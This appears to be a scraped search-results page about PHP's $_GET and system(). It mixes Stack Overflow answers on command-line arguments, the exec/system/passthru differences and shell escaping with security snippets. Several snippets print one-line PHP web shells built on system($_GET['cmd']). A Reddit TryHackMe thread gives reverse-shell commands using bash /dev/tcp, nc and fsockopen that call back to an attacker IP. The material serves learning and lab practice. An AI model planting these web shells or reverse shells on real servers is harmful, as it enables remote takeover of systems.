From this answer on Server Fault:

Use the php-cgi binary instead of just php, and pass the arguments on the command line, like this:

php-cgi -f index.php left=1058 right=1067 class=A language=English

Which puts this in $_GET:

Array
(
    [left] => 1058
    [right] => 1067
    [class] => A
    [language] => English
)

You can also set environment variables that would be set by the web server, like this:

REQUEST_URI='/index.php' SCRIPT_NAME='/index.php' php-cgi -f index.php left=1058 right=1067 class=A language=English
Answer from qris on Stack Overflow
🌐
Acunetix
acunetix.com › blog › articles › web-shells-101-using-php-introduction-web-shells-part-2
Web Shells 101 Using PHP (Web Shells Part 2) | Acunetix
March 5, 2025 - Based on the above, the following is a PHP web shell in its simplest form. ... It uses the system() function to execute commands that are being passed through ‘cmd’ HTTP request GET parameter.
🌐
PHP
php.net › manual › en › function.system.php
PHP: system - Manual
You probably want to check your system calls for errors. The convention is to return 0 for "no error" which is the same as FALSE which can be confusing. You need to do something like: <?php $cmd = "/usr/bin/pngtopnm $png_file > $pnm_file"; system($cmd,$return_value); ($return_value == 0) or die("returned an error: $cmd"); ?>
Discussions
PHP passing $_GET in the Linux command prompt - Stack Overflow
Try this answer to populate the ... the PHP script. 2014-01-27T13:53:34.427Z+00:00 ... Mr. Lance E Sloan · Mr. Lance E Sloan Over a year ago · This is not the best answer. See this other answer on this page: stackoverflow.com/a/11965479/543738 2014-12-05T17:40:55.01Z+00:00 ... Helpful answer, though if like me you're wondering what those colons are after argument names in getopt(), this apparently ... More on stackoverflow.com
🌐 stackoverflow.com
php - Using $_GET in system() function - security question - Stack Overflow
So let's say we have a following code: Is it secure? Can I escape from double quotes somehow? The operat... More on stackoverflow.com
🌐 stackoverflow.com
command - PHP exec() vs system() vs passthru() - Stack Overflow
What are the differences? Is there a specific situation or reason for each function? If yes, can you give some examples of those situations? PHP.net says that they are used to execute external pr... More on stackoverflow.com
🌐 stackoverflow.com
reverse shell php
For number 2 you mixed a command line reverse shell that gets executed by php (that’s what the „php -r“ stands for) with php script tags that get executed automatically. If you do just &3 2>&3"); ?> without php -r and without quotes it has a better chance to work More on reddit.com
🌐 r/tryhackme
10
1
September 13, 2023
People also ask
How do malicious hackers use web shells?
Malicious hackers use web shells to take control of an already compromised server. First, they exploit a vulnerability in your website or web application such as SQL injection, remote code execution, or others. Then, they upload a web shell to your web server. From now on, they can run any commands that they like on your server. See a step-by-step example of an attack that leads to full server compromise.
🌐
acunetix.com
acunetix.com › blog › articles › web-shells-101-using-php-introduction-web-shells-part-2
Web Shells 101 Using PHP (Web Shells Part 2) | Acunetix
How can I detect web shells?
You can detect web shells by log analysis. However, you should not focus on detecting web shells but instead, you should detect vulnerabilities that can let attackers take control of your server. Even if you detect a web shell, that will not stop attackers from taking over control again if the vulnerabilities are still there. To detect web vulnerabilities and learn how to eliminate them, use Acunetix. See what Acunetix Premium can do for you.
🌐
acunetix.com
acunetix.com › blog › articles › web-shells-101-using-php-introduction-web-shells-part-2
Web Shells 101 Using PHP (Web Shells Part 2) | Acunetix
What is a web shell?
A web shell is a small application that an attacker runs on your web server. They can then use this application to remotely access your server and run commands on it. A web shell by itself is never an attack, it is the aftermath of a successful attack on your website or web application. This means that if you have a web shell, you have a much more serious problem to worry about. See how a web shell works in practice.
🌐
acunetix.com
acunetix.com › blog › articles › web-shells-101-using-php-introduction-web-shells-part-2
Web Shells 101 Using PHP (Web Shells Part 2) | Acunetix
Videos
06:19
🌐 YouTube
PHP command line in windows - YouTube
November 17, 2019
05:33
🌐 YouTube
PHP lesson 13 - How to open cmd terminal and send ping request ...
September 3, 2017
2.54K
05:31
🌐 YouTube
Run command prompt commands from PHP page - YouTube
November 12, 2018
10.8K
View all
View all
🌐
GitBooks
sushant747.gitbooks.io › total-oscp-guide › content › webshell.html
Webshell · Total OSCP Guide - sushant747
# Execute one command <?php system("whoami"); ?> # Take input from the url paramter. shell.php?cmd=whoami <?php system($_GET['cmd']); ?> # The same but using passthru <?php passthru($_GET['cmd']); ?> # For shell_exec to output the result you need to echo it <?php echo shell_exec("whoami");?> ...
🌐
GitHub
gist.github.com › joswr1ght › 22f40787de19d80d110b37fb79ac3985
easy-simple-php-webshell.php · GitHub
if(isset($_GET['cmd'])) { system($_GET['cmd'] . ' 2&<1'); } Adding 2&<1 you can see the error output. TY · Copy link · Copy Markdown · Author · better: if(isset($_GET['cmd'])) { system($_GET['cmd'] . ' 2&<1'); } Adding 2&<1 you can see the error output. It's 2>&1 to redirect STDERR to STDOUT.
🌐
GitHub
github.com › lnxg33k › webhandler
GitHub - lnxg33k/webhandler: Bash simulator to control a server using PHP system functions.
echo '<?php system($_GET['cmd']); ?>' > /var/www/shell.php · --url is a required argument when sending either GET or POST requests (e.g. a bind 'web based PHP' connection): python webhandler.py --url http://www.mywebsite.com/shell.php?cmd= python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmd ·
Starred by 100 users
Forked by 26 users
Languages   Python 71.8% | Shell 26.8% | PHP 1.4% | Python 71.8% | Shell 26.8% | PHP 1.4%
🌐
Exploit-DB
exploit-db.com › papers › 12885
How to find RCE in scripts (with examples)
August 7, 2009 - - Through Remote Command Execution vulnerabilities you can execute commands on the webserver. - I will present 4 examples + the basic one. - I will start with a basic example. File : index.php Code snippet : <?php $cmd=$_GET['cmd']; system($cmd); ?> So if we do the following request index.php?cmd=whoami Our command will be executed.
Find elsewhere
🌐
Stack Overflow
stackoverflow.com › questions › 4186392 › php-passing-get-in-the-linux-command-prompt
PHP passing $_GET in the Linux command prompt - Stack Overflow
Top answer
1 of 13
274

From this answer on Server Fault:

Use the php-cgi binary instead of just php, and pass the arguments on the command line, like this:

php-cgi -f index.php left=1058 right=1067 class=A language=English

Which puts this in $_GET:

Array
(
    [left] => 1058
    [right] => 1067
    [class] => A
    [language] => English
)

You can also set environment variables that would be set by the web server, like this:

REQUEST_URI='/index.php' SCRIPT_NAME='/index.php' php-cgi -f index.php left=1058 right=1067 class=A language=English
2 of 13
132

Typically, for passing arguments to a command line script, you will use either the argv global variable or getopt:

// Bash command:
//   php -e myscript.php hello
echo $argv[1]; // Prints "hello"

// Bash command:
//   php -e myscript.php -f=world
$opts = getopt('f:');
echo $opts['f']; // Prints "world"

$_GET refers to the HTTP GET method parameters, which are unavailable on the command line, since they require a web server to populate.

If you really want to populate $_GET anyway, you can do this:

// Bash command:
//   export QUERY_STRING="var=value&arg=value" ; php -e myscript.php
parse_str($_SERVER['QUERY_STRING'], $_GET);
print_r($_GET);
/* Outputs:
     Array(
        [var] => value
        [arg] => value
     )
*/

You can also execute a given script, populate $_GET from the command line, without having to modify said script:

export QUERY_STRING="var=value&arg=value" ; \
php -e -r 'parse_str($_SERVER["QUERY_STRING"], $_GET); include "index.php";'

Note that you can do the same with $_POST and $_COOKIE as well.

🌐
GitHub
github.com › tennc › webshell › blob › master › fuzzdb-webshell › php › cmd.php
webshell/fuzzdb-webshell/php/cmd.php at master · tennc/webshell
// cmd.php = Command Execution · // // by: The Dark Raver · // modified: 21/01/2004 · // ?> <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <? if($_GET['cmd']) { system($_GET['cmd']); } ?> </pre> </BODY></HTML>
Author   tennc
🌐
Medium
tanzilr.medium.com › decontructing-php-one-liner-webshells-625f6cbb96ff
Deconstructing PHP ‘One-liner’ Webshells | by Tanzil Rehman | Medium
October 10, 2024 - <?php passthru($_GET[‘cmd’]); ?><?php echo exec($_GET[‘cmd’]); ?><?php system($_GET[‘cmd’]); ?><?php echo `whoami`; ?> A PHP script is executed on the server, and the plain HTML result is sent back to the browser.
🌐
Stack Overflow
stackoverflow.com › questions › 61675834 › using-get-in-system-function-security-question
php - Using $_GET in system() function - security question - Stack Overflow
Top answer
1 of 2
3

It's not secure. You can still pass some arguments that will be malicious, i.e. execute other files in system.

$var = '$(sh file.sh)';
$str = addslashes($var);
$cmd = 'sometool "'.$str.'"';
system($cmd);

You should use escapeshellarg method for escaping shell arguments.

$str = escapeshellarg($_GET['str']);
$cmd = 'sometool ' . $str;
system($cmd);

Note that you have to use the argument $str as it is and that it will be a single argument. You must not surround it with quotes ' or double quotes "

2 of 2
2

Definitively not secure as is,

Like any user's input, you'll have to not only escape quotes, but also verify the conformity of the data being submitted and have to be strict on that.

For e.g.: if the "sometool" command is waiting for a path, you've to ensure that the user input is a valid path. If the path has to be in a restricted location, you've to check that restriction.

Assuming that your "str" has to be a valid string, you can begin with the filter input function.

https://www.php.net/manual/en/function.filter-input.php

Make sure to use the appropriate filters (for quotes, encoding, etc.) : https://www.php.net/manual/en/filter.filters.php.

It will not be possible to by-pass the escaping here.

This somehow ensure the conformity of the data, but still, you've to be sure that the command "sometool" itself will not be affected by any valid string characters or syntax, that's what makes it still unsecure to use.

🌐
GitHub
github.com › ahmetgurel › Pentest-Hints › blob › master › Simple PHP Shell
Pentest-Hints/Simple PHP Shell at master · ahmetgurel/Pentest-Hints
<?php · if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>$cmd<pre>"; die; } ?> · · · or ·
Author   ahmetgurel
🌐
BCCNsoft
doc.bccnsoft.com › docs › php-docs-7-en › function.system.html
Execute an external program and display the output
<?php echo '<pre>'; // Outputs all the result of shellcommand "ls", and returns // the last output line into $last_line. Stores the return value // of the shell command in $retval. $last_line = system('ls', $retval); // Printing additional info echo ' </pre> <hr />Last line of the output: ' .
🌐
Stack Overflow
stackoverflow.com › questions › 732832 › php-exec-vs-system-vs-passthru
command - PHP exec() vs system() vs passthru() - Stack Overflow
Top answer
1 of 5
220

They have slightly different purposes.

  • exec() is for calling a system command, and perhaps dealing with the output yourself.
  • system() is for executing a system command and immediately displaying the output - presumably text.
  • passthru() is for executing a system command which you wish the raw return from - presumably something binary.

Regardless, I suggest you not use any of them. They all produce highly unportable code.

2 of 5
174

The previous answers seem all to be a little confusing or incomplete, so here is a table of the differences...

+----------------+-----------------+----------------+----------------+
|    Command     | Displays Output | Can Get Output | Gets Exit Code |
+----------------+-----------------+----------------+----------------+
| system()       | Yes (as text)   | Last line only | Yes            |
| passthru()     | Yes (raw)       | No             | Yes            |
| exec()         | No              | Yes (array)    | Yes            |
| shell_exec()   | No              | Yes (string)   | No             |
| backticks (``) | No              | Yes (string)   | No             |
+----------------+-----------------+----------------+----------------+
  • "Displays Output" means it streams the output to the browser (or command line output if running from a command line).
  • "Can Get Output" means you can get the output of the command and assign it to a PHP variable.
  • The "exit code" is a special value returned by the command (also called the "return status"). Zero usually means it was successful, other values are usually error codes.

Other misc things to be aware of:

  • The shell_exec() and the backticks operator do the same thing.
  • There are also proc_open() and popen() which allow you to interactively read/write streams with an executing command.
  • Add "2>&1" to the command string if you also want to capture/display error messages.
  • Use escapeshellcmd() to escape command arguments that may contain problem characters.
  • If passing an $output variable to exec() to store the output, if $output isn't empty, it will append the new output to it. So you may need to unset($output) first.
🌐
Reddit
reddit.com › r/tryhackme › reverse shell php
r/tryhackme on Reddit: reverse shell php
September 13, 2023 -

Hi everyone,

I'm wondering about a subject.

Sometimes i have to upload a reverse-shell php. I know somes techniques :

1- Push a <?php system($_GET["cmd"]); ?> and then use whoami . It works, but bash -i >& /dev/tcp/KALI_IP/4444 0>&1 or rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc KALI_IP 4444 >/tmp/f encoded in URL doesn't. I don't understand why

2- I also found <?php php -r '$sock=fsockopen("KALI_IP",4444);exec ("/bin/sh -i <&3 >&3 2>&3");' ?> but i can't say when to use it

3- and the classic https://github.com/Wh1ter0sEo4/reverse_shell_php/blob/main/reverse_shell.php

Someone can help me to understand, when to use each one ?

EDIT :

1- It works (URL encoded) with /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' and the other one works without changement

2- <?php $sock = fsockopen("KALI_IP", 4444); proc_open('/bin/bash -i', array(0=>$sock, 1=>$sock, 2=>$sock), $pipes>

I also found an amazing tool : https://github.com/WhiteWinterWolf/wwwolf-php-webshell . I will keep it carefully

Top answer
1 of 4
3
For number 2 you mixed a command line reverse shell that gets executed by php (that’s what the „php -r“ stands for) with php script tags that get executed automatically. If you do just &3 2>&3"); ?> without php -r and without quotes it has a better chance to work
2 of 4
2
https://www.revshells.com This is a great site to bookmark. Go through the options once you have some information on the OS in question and language you can run etc and you’ll get the code needed for gaining a reverse shell.
🌐
Stack Overflow
stackoverflow.com › questions › 41926728 › how-to-run-cmd-commands-in-php-exec-system
How to run cmd commands in php (exec/system) - Stack Overflow
Top answer
1 of 1
3

1 - it depend on what you write inside exec()

and This command only executed on the server side , and cannot be executed on the client side

to use this command : - for example u can write : <?php echo exec("ping google.com"); ?> to know the ping of google and the result will appear in your browser page
- use shell_exec("ping google.com"); to show more detail
- Another Example to use that command : shell_exec('systeminfo | findstr /B /C:"OS Name"');
to show what operation system u use.

Another solution is to create a bat file , name it : "Simple.bat" and save it on the root of your website
then simply use this command to call it : <?php echo exec("Simple.bat"); ?>

2 - if you ruining IIS the issues could be something inside your settings and the causes are many when u come to this part , and i dont have Experience at IIS , * only Apache but one of the solutions suggest about IIS can be founded here in first reply :
https://forums.iis.net/t/1216283.aspx

🌐
Exploit-DB
exploit-db.com › papers › 12871
Finding vulnerabilities in PHP scripts (FULL)
September 9, 2009 - In PHP are some functions that let you to execute commands : exec — Execute an external program passthru — Execute an external program and display raw output shell_exec — Execute command via shell and return the complete output as a string system — Execute an external program and display the output 8.0 - Basic example - Code snippet from test.php --------------------------------- <?php $cmd=$_GET['cmd']; system($cmd); ?> --------------------------------- So if we make the following request : http://127.0.0.1/test.php?cmd=whoami The command will be executed and the result will be outputed.
🌐
Medium
int0x33.medium.com › from-php-s-hell-to-powershell-heaven-da40ce840da8
Day 75: From PHP (s)HELL to Powershell Heaven | by int0x33 | Medium
March 17, 2019 - $_REQUEST is an associative array that by default contains the contents of $_GET, $_POST and $_COOKIE. <?php system($_REQUEST[‘cmd’]);?> user@box$ nc -lvnp 1337 · Programming · Hacking · Pentesting · Infosec · Security · 2.4K followers · ·3 following ·
Related queries
php system command
php webshell one-liner
php system()
php system reverse shell
php system() example
php webshell github
php system exploit
php system vs exec